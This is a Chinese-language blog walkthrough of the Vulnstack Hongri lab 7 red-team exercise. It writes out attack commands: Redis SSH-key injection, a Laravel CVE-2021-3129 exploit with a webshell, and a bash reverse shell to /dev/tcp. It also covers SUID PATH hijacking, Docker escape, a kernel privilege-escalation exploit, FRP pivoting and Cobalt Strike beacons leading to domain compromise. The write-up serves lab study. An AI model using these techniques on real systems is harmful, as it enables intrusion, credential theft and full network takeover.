当前位置：首页 > article >正文

红队评估红日靶场7

article 2026/4/10 8:15:36

声明本文所涉及的技术、代码、工具及方法仅供网络安全研究与授权测试使用。未经目标系统所有者书面授权严禁对任何系统进行渗透测试、漏洞探测或攻击行为。作者本人对因滥用本文内容而导致的任何直接或间接后果不承担法律责任。请遵守《中华人民共和国网络安全法》及相关法律法规合法合规地使用技术。未经授权的测试属于违法行为后果自负。环境配置参考redis服务要用root开启万字讲解内网横向渗透vulnstack七红日靶场7实战全流程-CS上线全部Web1/Web2/PC1/PC2/DC_红日靶场七-CSDN博客靶机下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/9/信息收集nmap扫描发现端口fscan进行扫描发现存在未授权redis服务还有cve漏洞Redis渗透生成ssh私钥在攻击机中生成一对RSA 非对称加密密钥默认在当前用户.ssh目录下创建私钥文件id_rsa和公钥文件id_rsa.pub该密钥对可用于实现SSH免密登录、数字签名或加密传输等安全认证场景。# 执行密钥生成命令ssh-keygen -t rsa查看生成是公钥cat ~/.ssh/id_rsa.pub写入到Redis服务器redis-cli –h 192.168.152.168依次执行命令config set dir /root/.ssh/ config set dbfilename authorized_keys set marginl \n\n\n\ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZi2rJFX7o4G4r/Fdvs3iNOSfE/ecm77p7mZkkRnMpo6sxIITdZ4PRXmf2MyqypsRKSznZZrs/kDqsfEYp4IplfRvsG32N9WeJgr8WCkdm3kBd9QcxRBCfb7rIanjukKw8YzNfFXKLxVMhKgzfCudtClSc2CZcPcOGCwhqoYqTbZclkIHxCmHx5x7SxMr7pdTP1tWlm2Csar0ASnb9tP/AUkvLlJO9tj0m6rkYgwRcOaftzWwrzyQcXj6q2PToQxDy5tFVyBAI1N610mee9rGrIboEMPeIGlzbNBBl5yCINCRKatqHZMCYQFU0sQJzWNLyoAKEu/fIsVzTj9dEDR4cADHZKfCN2xK2w6JyJ6RkunzykRe9sRfHZEke7xCqLX0VCydeU3R2WMqvSJx6DYU6OJMft0djMtToXgtuNzVpETxRSLDhhy2IGv1eWusuciIZ6mZ7MJpZhUIDazySw3q1bpp8owG0OhSGFIFwElOjVF7BOQnyAhoWVk kalikali \n\n\n save进行ssh连接ssh root192.168.152.168 -i ~/.ssh/id_rsa同时在利用findshell进行ssh连接方便上传文件认证用上面生成的私钥web渗透laravel渗透访问81端口http://192.168.152.168:81/存在Laravel服务有现成cvepoc 下面是poc地址https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP执行pocpython laravel-CVE-2021-3129-EXP.py http://192.168.152.168:81成功拿到了连接地址只不过poc版本老需要哥斯拉2.96https://github.com/BeichenDream/Godzilla/releases/tag/v2.96-godzilla运行java -jar Godzilla-V2.96.jar记得将有效载荷选择为php利用上面运行得到的poc地址成功连接docker逃逸查看根目录文件ls -la /发现存在docker 需要实现docker逃逸因为交互性很差所以我们反弹shell到web1 web1开启一个监听在web2执行反弹shellbash -c exec bash -i /dev/tcp/192.168.52.10/55551成功回连查看suid特权文件发现有一个shell 一个passwdpasswd 是乱码的那么执行shell看看file /home/jobs/shell发现是elf可执行文件接着查看同目录下的demo.c文件有一个sysytem(ps)这里考虑PATH环境变量劫持提权攻击cd /tmp echo /bin/bash ps chmod 777 ps echo $PATH export PATH/tmp:$PATH cd /home/jobs ./shell准备恶意程序cd /tmp - 进入可写目录echo /bin/bash ps - 创建一个名为 ps 的文件内容为 /bin/bashchmod 777 ps - 赋予该文件所有用户可执行权限劫持系统命令路径echo $PATH - 查看当前系统的命令搜索路径export PATH/tmp:$PATH - 关键步骤将 /tmp 目录添加到 PATH 环境变量的最前面。这意味着当系统需要执行一个命令时会优先在 /tmp 目录下寻找。触发执行并提权cd /home/jobs./shell - 执行这个SUID程序成功提权开始挂载这里提前把cdk文件下载到靶机具体方法可以看我上一篇文章./cdk run mount-disk成功挂载在挂载的目录下发现账号密码 ubuntussh登录ssh ubuntu192.168.52.20web2提权web2下载fscan 然后扫描CVE-2021-3493是Linux内核中的一个高危本地权限提升的安全风险它主要影响Ubuntu系统。攻击者可以利用此它从普通用户权限提升至root权限https://github.com/briskets/CVE-2021-3493将下载的文件上传到靶机攻击机需要开启http服务具体方法参考上一篇文章gcc exploit.c -o exploit_ljn chmod x exploit_ljn ./exploit_ljn成功提权FRP配置第一层反向代理1.下载文件并且解压wget https://ghproxy.net/https://github.com/fatedier/frp/releases/download/v0.61.0/frp_0.61.0_linux_amd64.tar.gz2.配置frpc.toml文件serverAddr 192.168.152.128 serverPort 7000 [[proxies]] name socks5 type tcp remotePort 12347 [proxies.plugin] type socks5kali执行/frps -c frps.toml将frpc frpc.toml上传到web1kali配置代理配置/etc/proxychains4.conf文件添加socks5 0.0.0.0 12347tips:这里还可以利用msf上线直接添加路由PC1渗透访问PC1的通达OA服务192.168.52.30:8080需要配置socks5代理192.168.59.128:12347利用通达OA工具成功扫出漏洞直接文件上传然后利用蚁剑连接要配置代理成功拿到shell添加路由kali添加路由ip route add 192.168.152.0/24 dev eth0 route add -net 192.168.52.0 netmask 255.255.255.0 gw 192.168.152.168 eth0Web1添加转发功能sysctl -w net.ipv4.ip_forward1Web2添加路由 route add -net 192.168.152.0 netmask 255.255.255.0 gw 192.168.52.10 eth0 PC1添加路由 route add 192.168.152.0 mask 255.255.255.0 192.168.52.10 成功连通cs上线1.配置监听器https利用cs插件genCrossC2.Win生成linux木马genCrossC2.exe 192.168.59.128 10050 ./.cobaltstrike.beacon_keys null Linux x64 ljn-10050.out raw将生成的out文件放入web1 并且运行cs成功上线web1接着在web1的baecon文件ljn-10050.out目录中执行python3 -m http.server 8888web2下载wget http://192.168.52.10:8888/ljn-10050.out执行木马成功上线web2再次添加cs监听器选择 payload 类型Beacon HTTP并配置回连的IP地址团队服务器的IP地址192.168.152.128和端口10087任意不冲突即可。生成木马因为蚁剑已经连接了pc1 上传木马文件执行木马文件成功上线pc1pc1抓取哈希明文密码成功拿到域管理员的账号密码进行一些端口扫描信息收集CS创建SMB监听横向移动手动打开PC1防火墙配置成功上线DC继续上述操作这里我pc2没有成功上线不知道哪里有问题直接拿参考这里的上线pc2参考万字讲解内网横向渗透vulnstack七红日靶场7实战全流程-CS上线全部Web1/Web2/PC1/PC2/DC_红日靶场七-CSDN博客

红队评估红日靶场7

相关文章：

红队评估红日靶场7

云容笔谈部署教程（Windows WSL2）：NVIDIA CUDA兼容性配置避坑指南

Linux学习笔记（二十）--网络基础1

G-Helper：华硕笔记本轻量化控制解决方案详解

为啥学C语言绕不开指针？懂它封神，不懂直接劝退，真相太扎心

linux内核 - request_irq 介绍

Qwen3.5-4B-Claude-OpusAI应用：轻量级推理服务嵌入内部知识库方案

零基础玩转CYBER-VISION：手把手教你搭建未来科技风目标分割系统

OpenClaw极简部署：Kimi-VL-A3B-Thinking云端镜像10分钟快速体验

终极指南：如何快速重置JetBrains IDE试用期 - ide-eval-resetter完全教程

快速上手LongCat动物百变秀：从安装到出图完整流程

Windows虚拟手柄驱动终极指南：免费实现游戏控制器100%兼容

3步打造高效多平台直播：OBS Multi RTMP插件完整解决方案

千问3.5-2B开源镜像部署教程：4.3GB权重免下载，24GB显存稳定运行

Jasminum：中文文献管理的终极解决方案，三步提升Zotero效率300%

OpenClaw自动化写作：Qwen3.5-9B解析配图生成技术文章

ComfyUI-Manager终极指南：如何快速解决SVD模型加载错误并优化AI工作流

笔记草稿本

告别手动输入！LaTeX公式一键粘贴到Word的终极解决方案

RexUniNLU与VSCode插件开发：智能代码注释生成工具

XUnity.AutoTranslator终极指南：如何为Unity游戏实现实时自动翻译

保姆级教程：用深度学习项目训练环境，10分钟复现你的第一个AI项目

Hunyuan-MT-7B翻译模型部署问题排查：启动失败、内存不足解决方案

完全掌握G-Helper：华硕ROG笔记本色彩配置文件一键恢复实战指南

春联生成模型-中文-base实战：输入‘富贵‘、‘吉祥‘，AI自动创作工整对联

手把手教程：用EagleEye镜像3步实现实时目标检测，小白也能轻松上手

FreeMove终极指南：98%成功率的Windows目录迁移神器，让C盘重获新生 [特殊字符]

如何快速提升中文文献管理效率：Jasminum插件3大核心功能完整指南

SAP MRP独立需求与相关需求业务解析

Node.js后端调用PyTorch模型：基于PyTorch 2.8镜像构建AI服务